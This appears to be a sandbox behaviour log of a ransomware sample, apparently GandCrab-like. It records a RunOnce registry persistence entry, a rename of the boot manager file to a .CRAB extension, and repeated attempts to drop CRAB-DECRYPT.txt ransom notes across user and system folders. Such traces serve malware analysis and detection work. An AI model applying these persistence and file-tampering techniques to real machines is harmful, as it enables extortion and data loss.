Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = wwbqfihnkoe, data = "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe", size = 112, type = REG_SZ True 1
Thread 0x5f0
315 0
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Get Info filename = C:\bootmgr, type = file_attributes True 1
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IME12\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP12\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP8_1\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP9_0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\356BZ594\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\N4CF7XJW\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\WIK9MYAA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\ZE5P2FRT\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\16.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\minidumps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\changes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\failed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\toFetch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Skype\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Desktop\3gmBUqZ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
